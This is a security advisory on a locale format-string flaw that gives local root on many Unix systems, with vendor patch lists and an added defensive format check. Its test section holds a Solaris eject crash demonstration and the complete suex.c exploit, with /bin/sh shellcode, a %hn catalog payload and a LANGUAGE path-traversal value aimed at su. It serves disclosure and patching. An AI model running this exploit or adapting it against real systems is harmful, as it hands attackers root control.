Format string vulnerability in the locale subsystem of many Unix systems
Published: 2000-09-05
Updated: 2000-09-08
Affected systems:
Conectiva Linux 5.1
Conectiva Linux 5.0
Conectiva Linux 4.2
Conectiva Linux 4.1
Conectiva Linux 4.0
Debian Linux 2.3
Debian Linux 2.2
Debian Linux 2.1
Debian Linux 2.0
RedHat Linux 6.2
RedHat Linux 6.1
RedHat Linux 6.0
RedHat Linux 5.2
RedHat Linux 5.1
RedHat Linux 5.0
SGI IRIX 6.5.x
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
Sun Solaris 8.0
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5.1
Sun Solaris 2.x
Description:
Following the X/Open XPG3, XPG4 and Sun/Uniforum specifications, many UNIX operating systems provide
internationalization support in the form of the locale subsystem. The locale subsystem consists of a set of
databases that store language and country information, together with a set of library functions for
accessing and managing that information.
One of these databases holds the messages used by almost every program in the operating system, so a copy
of it is kept for each supported language. Programs access this database through gettext, dgettext and
dcgettext (Sun/Uniforum specification) or through catopen, catgets and catclose (X/Open XPG3 and XPG4
specifications).
Typically, when a program needs to show the user a message, it looks the message up in this database using
the message text itself as the key and then displays the result (in the correct language) with the
printf() family of functions. By creating a specially crafted message database, an attacker can control the
output of the lookup function, which is then handed to printf.
If a program follows the careless practice of passing the looked-up string to printf as its format string,
an attacker can exploit any SUID program on the system that does so to obtain root privileges.
On some operating systems an attacker can carry out this attack by passing environment variables through
telnetd, but must first be able to place a suitable message database on the target host. Because the glibc
used on Linux systems has a second security flaw, the two combined let an attacker compromise the system.
(The patch Red Hat first provided for 6.x could cause applications such as the JDK to fail, so they upgraded
glibc again to 2.1.3-21; see the solution section below.)
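As an editor-added illustration of the defensive side (this code is not part of the advisory or of the NSFOCUS test program), the check below accepts a looked-up translation only when its printf conversions match those of the msgid and it contains no %n, and falls back to the untranslated message otherwise. The catalog strings and all function names are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample catalog entries (not taken from the advisory's output).
 * MSGID is the glibc getopt message that the NSFOCUS test program targets. */
static const char *MSGID     = "%s: invalid option -- %c\n";
static const char *BENIGN    = "%s: option invalide -- %c\n";
static const char *MALICIOUS = "%.8x%.8x%.8x%hn%.8x%hn";

/* Reduce a printf format to its sequence of conversion characters,
 * e.g. "%s: invalid option -- %c\n" -> "sc".  A '*' width or precision
 * is recorded as well because it consumes an argument.  Returns -1 if the
 * format contains %n (a memory write) or a truncated specifier. */
int format_signature(const char *fmt, char *out, size_t outlen) {
    size_t n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                   /* "%%" is a literal '%' */
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p)) {
            if (*p == '*') {
                if (n + 1 >= outlen) return -1;
                out[n++] = '*';
            }
            p++;
        }
        if (*p == '\0' || *p == 'n') return -1;
        if (n + 1 >= outlen) return -1;
        out[n++] = *p;
    }
    out[n] = '\0';
    return (int)n;
}

/* Use the translation only when its conversions match the msgid's;
 * otherwise fall back to the untranslated msgid.  This is the run-time
 * counterpart of msgfmt's c-format check, which a catalog supplied by the
 * user through NLSPATH or LANGUAGE has never been through. */
const char *checked_translation(const char *msgid, const char *msgstr) {
    char a[32], b[32];
    if (format_signature(msgid, a, sizeof a) < 0) return msgid;
    if (format_signature(msgstr, b, sizeof b) < 0) return msgid;
    return strcmp(a, b) == 0 ? msgstr : msgid;
}

/* Hardened call site.  The vulnerable form the advisory describes is the
 * same call with the raw catalog string as the format and no check. */
void report_invalid_option(const char *prog, int opt, const char *msgstr) {
    fprintf(stderr, checked_translation(MSGID, msgstr), prog, opt);
}
```

The vendor updates listed in the solution section close the hole at the library level instead, so that a set-user-ID program no longer honours a user-supplied catalog location; the check above is what an application can do itself when it must display a catalog string it does not fully trust.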
<* Source: Ivan Arce (iarce@core-sdi.com)
Buenos Aires
Argentina
zenith parsec (zenith_parsec@the-astronaut.com)
Jouko Pynnönen (jouko@solutions.fi)
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!
$ uname -a
SunOS maul 5.7 Generic_106541-02 sun4m Sparc SUNW,SPARCstation-5
$ ls -l
$ ls -l /usr/bin/eject
-r-sr-xr-x 1 root bin 14352 Oct 6 1998 /usr/bin/eject
$ eject -x`perl -e 'print "ABCDEF" . "A"x507'`
eject: illegal option -- x
usage: eject [-fndq] [name | nickname]
options:   -f force eject
           -n show nicknames
           -d show default device
           -q query for media present
           -p do not call eject_popup
$ cat >doit.sh
#!/bin/ksh
export NLSPATH=:`pwd`
echo domain \"messages\" > messages.po
echo msgid \""usage: %s [-fndq] [name | nickname]\\\n"\" >> messages.po
echo msgstr \"`perl -e 'print "%x"x112 . "%n"'`\" >> messages.po
msgfmt messages.po
cp messages.mo SUNW_OST_OSCMD
cp messages.mo SUNW_OST_OSLIB
exec eject -x`perl -e 'print "ABCDEF" . "A"x507'`
^D
$ ./doit.sh
eject: illegal option -- x
ffbefbd07efefeff1ff00ff3358b8ffbefbd0000000ff3dc9042ffbefafc129642326c00ffbefa981
15083ffbefafc4ffbefb085ffbefb54002ffbefafcffbefb0823000000000000000000000002ffbef
bd0ffbefbd60ffbefddaffbefde7ffbefe06ffbefea1ffbefeb2ffbefecaffbefee4ffbefef6ffbef
f04ffbeff0cffbeff26ffbeff35ffbeff64ffbeff76ffbeff91ffbeff9cffbeffb6ffbeffd407d8ff
beffdb7deffbeffeb3100344205591142c7ff3b00008300620007d007d1647d217d317d97000656a6
56374002d78414243444546414141414141Bus Error
$ exit
NSFOCUS provides a test program for Linux:
[----------------------------suex.c------------------------------------]
/* exploit for glibc/locale format strings bug.
 * Tested in RedHat 6.2 with kernel 2.2.16.
 * Script kiddies: you should modify this code
 * slightly by yourself. :)
 *
 * Greets: Solar Designer, Jouko Pynnönen, zenith parsec
 *
 * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
 * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
 *
 * by warning3@nsfocus.com (http://www.nsfocus.com)
 * y2k/9/6
 */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>     /* memset, memcpy, strlen */
#include <unistd.h>
#include <sys/stat.h>   /* mkdir */

#define DEFAULT_OFFSET 550
#define DEFAULT_ALIGNMENT 2
#define DEFAULT_RETLOC 0xbfffd2ff
#define DEFAULT_BUFFER_SIZE 2048
#define DEFAULT_EGG_SIZE 1024
#define NOP 0x90
#define PATH "/tmp/LC_MESSAGES"

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* i386/gcc only: the value is whatever is left in %eax */
unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
    char *buff, *buff1, *ptr, *egg;
    char *env[3];
    long shell_addr, retloc = DEFAULT_RETLOC, tmpaddr;
    int offset = DEFAULT_OFFSET, align = DEFAULT_ALIGNMENT;
    int bsize = DEFAULT_BUFFER_SIZE, eggsize = DEFAULT_EGG_SIZE;
    int i, reth, retl, num = 113;
    FILE *fp;

    /* optional command-line overrides for the defaults above */
    if (argc > 1) sscanf(argv[1], "%x", &retloc);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) num = atoi(argv[3]);
    if (argc > 4) align = atoi(argv[4]);
    if (argc > 5) bsize = atoi(argv[5]);
    if (argc > 6) eggsize = atoi(argv[6]);
    printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n", argv[0]);

    /* buff: argument handed to su; buff1: format string written into the catalog;
     * egg: environment entry carrying the payload */
    if (!(buff = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    if (!(buff1 = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    printf("Using RET location address: 0x%x\n", retloc);
    shell_addr = get_esp() + offset;
    printf("Using Shellcode address: 0x%x\n", shell_addr);
    reth = (shell_addr >> 16) & 0xffff;
    retl = (shell_addr >> 0) & 0xffff;

    ptr = buff;
    for (i = 0; i < 2; i++, retloc += 2) {
        memset(ptr, 'A', 4);
        ptr += 4;
        (*ptr++) = retloc & 0xff;
        (*ptr++) = (retloc >> 8) & 0xff;
        (*ptr++) = (retloc >> 16) & 0xff;
        (*ptr++) = (retloc >> 24) & 0xff;
    }
    memset(ptr, 'A', align);

    ptr = buff1;
    for (i = 0; i < num; i++) {
        memcpy(ptr, "%.8x", 4);
        ptr += 4;
    }
    sprintf(ptr, "%%%uc%%hn%%%uc%%hn", (retl - num * 8),
            (0x10000 + reth - retl));

    /* write the catalog source for the getopt message and compile it with msgfmt */
    mkdir(PATH, 0755);
    chdir(PATH);
    fp = fopen("libc.po", "w+");
    fprintf(fp, "msgid \"%%s: invalid option -- %%c\\n\"\n");
    fprintf(fp, "msgstr \"%s\\n\"", buff1);
    fclose(fp);
    system("/usr/bin/msgfmt libc.po -o libc.mo");

    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    egg[eggsize - 1] = '\0';
    memcpy(egg, "EGG=", 4);

    /* catalog directory is reached through the LANGUAGE environment variable */
    env[0] = egg;
    env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
    env[2] = (char *)0;
    execle("/bin/su", "su", "-u", buff, NULL, env);
    return 0;
} /* end of main */
Solution:
Vendor patches:
Some Linux vendors have already provided patches:
[CONECTIVA LINUX]
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/nscd-2.1.3-9cl.i386.rpm
[Debian Linux]
Debian GNU/Linux 2.2 alias potato
------------------------------------
Source archives:
http://security.debian.org/dists/stable/updates/main/source/glibc_2.1.3-13.diff.gz
http://security.debian.org/dists/stable/updates/main/source/glibc_2.1.3-13.dsc
http://security.debian.org/dists/stable/updates/main/source/glibc_2.1.3.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-all/glibc-doc_2.1.3-13_all.deb
http://security.debian.org/dists/stable/updates/main/binary-all/i18ndata_2.1.3-13_all.deb
Alpha architecture:
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1-dbg_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1-dev_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1-pic_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1-prof_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libnss1-compat_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/locales_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/nscd_2.1.3-13_alpha.deb
ARM architecture:
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6-dbg_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6-dev_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6-pic_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6-prof_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/locales_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/nscd_2.1.3-13_arm.deb
Intel ia32 architecture:
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6-dbg_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6-dev_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6-pic_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6-prof_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libnss1-compat_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/locales_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/nscd_2.1.3-13_i386.deb
PowerPC architecture:
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6-dbg_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6-dev_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6-pic_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6-prof_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/locales_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/nscd_2.1.3-13_powerpc.deb
Sun Sparc architecture:
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6-dbg_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6-dev_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6-pic_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6-prof_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/locales_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/nscd_2.1.3-13_sparc.deb
[REDHAT LINUX]:
Red Hat Linux 5.x:
sparc:
ftp://updates.redhat.com/5.2/sparc/glibc-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-debug-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-devel-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-profile-2.0.7-29.2.sparc.rpm
alpha:
ftp://updates.redhat.com/5.2/alpha/glibc-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-debug-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-devel-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-profile-2.0.7-29.2.alpha.rpm
i386:
ftp://updates.redhat.com/5.2/i386/glibc-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-debug-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-devel-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-profile-2.0.7-29.2.i386.rpm
sources:
ftp://updates.redhat.com/5.2/SRPMS/glibc-2.0.7-29.2.src.rpm
Red Hat Linux 6.x:
sparc:
ftp://updates.redhat.com/6.2/sparc/glibc-2.1.3-21.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/glibc-devel-2.1.3-21.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/glibc-profile-2.1.3-21.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nscd-2.1.3-21.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/glibc-2.1.3-21.i386.rpm
ftp://updates.redhat.com/6.2/i386/glibc-devel-2.1.3-21.i386.rpm
ftp://updates.redhat.com/6.2/i386/glibc-profile-2.1.3-21.i386.rpm
ftp://updates.redhat.com/6.2/i386/nscd-2.1.3-21.i386.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/glibc-2.1.3-21.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/glibc-devel-2.1.3-21.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/glibc-profile-2.1.3-21.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nscd-2.1.3-21.alpha.rpm
sparcv9:
ftp://updates.redhat.com/6.2/sparcv9/glibc-2.1.3-21.sparcv9.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/glibc-2.1.3-21.src.rpm